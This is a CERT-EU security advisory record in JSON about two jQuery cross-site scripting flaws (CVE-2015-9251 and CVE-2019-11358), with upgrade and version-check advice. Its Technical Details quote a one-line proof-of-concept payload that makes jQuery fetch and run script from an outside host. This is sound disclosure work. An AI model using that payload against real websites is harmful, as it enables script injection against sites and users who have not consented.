{
    "file_item": {
        "filepath": "security-advisories",
        "filename": "CERT-EU-SA2019-016.pdf"
    },
    "title": "Several Vulnerabilities in JQuery",
    "serial_number": "2019-016",
    "publish_date": "23-08-2019 15:33:00",
    "description": "A popular JavaScript framework jQuery has multiple cross-site scripting vulnerabilities. While they are not critical, due to large popularity of jQuery they may be used in many various ways, and hence it is strongly advisable to upgrade jQuery to the latest version.",
    "url_title": "2019-016",
    "content_markdown": "---\ntitle: 'Several Vulnerabilities in JQuery'\nversion: '1.0'\nnumber: '2019-016'\ndate: 'August 23, 2019'\n---\n\n_History:_\n\n* _23/08/2019 --- v1.0: Initial publication_\n\n# Summary\n\nA popular JavaScript framework jQuery has multiple cross-site scripting vulnerabilities. While they are not critical, due to large popularity of jQuery they may be used in many various ways, and hence it is strongly advisable to upgrade jQuery to the latest version.\n\n# Technical Details\n\njQuery before 3.0.0 is vulnerable to cross-site scripting (XSS) attacks when a cross-domain Ajax request is performed without the `dataType` option, causing text/javascript responses to be executed (CVE-2015-9251) [1].\n\njQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles `jQuery.extend(true, {}, ...)` because of `Object.prototype` pollution. If an unsanitized source object contained an enumerable prototype property, it could extend the native `Object.prototype`. This could allow for cross-site scripting (CVE-2019-11358) [2, 3].\n\nProof of concept of the vulnerability is publicly available:\n\n- Browse to a page in question using Google Chrome;\n- Open Google Developer -> Console tab and insert payload as:\n\n\t`jQuery.get('https://sakurity.com/jqueryxss\u2019)`\n\n# Products Affected\n\nRespectively, all websites using jQuery prior to version 3.0.0 (CVE-2015-9251) and 3.4.0 (CVE-2019-11358) are affected.\n\n# Recommendations\n\nVerify the version of jQuery library used by using development tools in the browser with the page in question opened by running the following command:\n\n\tjQuery().jquery\n\nin case this does not work, an alternative command is:\n\n\tjQuery.fn.jquery\n\nIf the version of jQuery is prior 3.4.0, it is recommended to upgrade it.\n\n# References\n\n[1] <https://nvd.nist.gov/vuln/detail/CVE-2015-9251>\n\n[2] <https://nvd.nist.gov/vuln/detail/CVE-2019-11358>\n\n[3] <https://www.cvedetails.com/cve/CVE-2019-11358>\n",
    "content_html": "<p><em>History:</em></p><ul><li><em>23/08/2019 --- v1.0: Initial publication</em></li></ul><h2 id=\"summary\">Summary</h2><p>A popular JavaScript framework jQuery has multiple cross-site scripting vulnerabilities. While they are not critical, due to large popularity of jQuery they may be used in many various ways, and hence it is strongly advisable to upgrade jQuery to the latest version.</p><h2 id=\"technical-details\">Technical Details</h2><p>jQuery before 3.0.0 is vulnerable to cross-site scripting (XSS) attacks when a cross-domain Ajax request is performed without the <code>dataType</code> option, causing text/javascript responses to be executed (CVE-2015-9251) [1].</p><p>jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles <code>jQuery.extend(true, {}, ...)</code> because of <code>Object.prototype</code> pollution. If an unsanitized source object contained an enumerable prototype property, it could extend the native <code>Object.prototype</code>. This could allow for cross-site scripting (CVE-2019-11358) [2, 3].</p><p>Proof of concept of the vulnerability is publicly available:</p><ul><li>Browse to a page in question using Google Chrome;</li><li><p>Open Google Developer -> Console tab and insert payload as:</p><p><code>jQuery.get('https://sakurity.com/jqueryxss\u2019)</code></p></li></ul><h2 id=\"products-affected\">Products Affected</h2><p>Respectively, all websites using jQuery prior to version 3.0.0 (CVE-2015-9251) and 3.4.0 (CVE-2019-11358) are affected.</p><h2 id=\"recommendations\">Recommendations</h2><p>Verify the version of jQuery library used by using development tools in the browser with the page in question opened by running the following command:</p><pre><code>jQuery().jquery\n</code></pre><p>in case this does not work, an alternative command is:</p><pre><code>jQuery.fn.jquery\n</code></pre><p>If the version of jQuery is prior 3.4.0, it is recommended to upgrade it.</p><h2 id=\"references\">References</h2><p>[1] <a rel=\"noopener\" target=\"_blank\" href=\"https://nvd.nist.gov/vuln/detail/CVE-2015-9251\">https://nvd.nist.gov/vuln/detail/CVE-2015-9251</a></p><p>[2] <a rel=\"noopener\" target=\"_blank\" href=\"https://nvd.nist.gov/vuln/detail/CVE-2019-11358\">https://nvd.nist.gov/vuln/detail/CVE-2019-11358</a></p><p>[3] <a rel=\"noopener\" target=\"_blank\" href=\"https://www.cvedetails.com/cve/CVE-2019-11358\">https://www.cvedetails.com/cve/CVE-2019-11358</a></p>",
    "licence": {
        "title": "Creative Commons Attribution 4.0 International (CC-BY 4.0)",
        "link": "https://creativecommons.org/licenses/by/4.0/",
        "restrictions": "https://cert.europa.eu/legal-notice",
        "author": "The Cybersecurity Service for the Union institutions, bodies, offices and agencies"
    }
}